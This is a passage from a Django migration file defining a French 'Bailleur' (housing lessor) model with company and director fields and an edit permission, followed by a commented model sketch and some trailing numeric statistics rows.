("id", models.AutoField(primary_key=True, serialize=False)),
("uuid", models.UUIDField(default=uuid.uuid4, editable=False)),
("nom", models.CharField(max_length=255)),
("siret", models.CharField(max_length=14)),
("capital_social", models.CharField(max_length=255)),
("siege", models.CharField(max_length=255)),
("dg_nom", models.CharField(max_length=255)),
("dg_fonction", models.CharField(max_length=255)),
("dg_date_deliberation", models.DateField()),
("operation_exceptionnelle", models.TextField()),
("cree_le", models.DateTimeField(auto_now_add=True)),
("mis_a_jour_le", models.DateTimeField(auto_now=True)),
],
options={
"permissions": (
("can_edit_bailleur", "Créer ou mettre à jour un bailleur"),
),
},
),
]
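# Illustrative only: a sketch of the model in bailleurs/models.py that this initial
# migration would correspond to, reconstructed from the operations above. Field
# names and types mirror the migration; anything else (ordering, verbose names)
# is an assumption, so it is left as a commented sketch rather than live code.
#
#   import uuid
#   from django.db import models
#
#   class Bailleur(models.Model):
#       uuid = models.UUIDField(default=uuid.uuid4, editable=False)
#       nom = models.CharField(max_length=255)
#       siret = models.CharField(max_length=14)
#       capital_social = models.CharField(max_length=255)
#       siege = models.CharField(max_length=255)
#       dg_nom = models.CharField(max_length=255)
#       dg_fonction = models.CharField(max_length=255)
#       dg_date_deliberation = models.DateField()
#       operation_exceptionnelle = models.TextField()
#       cree_le = models.DateTimeField(auto_now_add=True)
#       mis_a_jour_le = models.DateTimeField(auto_now=True)
#
#       class Meta:
#           permissions = (
#               ("can_edit_bailleur", "Créer ou mettre à jour un bailleur"),
#           )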
| 35.027027
| 80
| 0.548611
| 1,193
| 0.919106
| 0
| 0
| 0
| 0
| 0
| 0
| 265
| 0.20416
|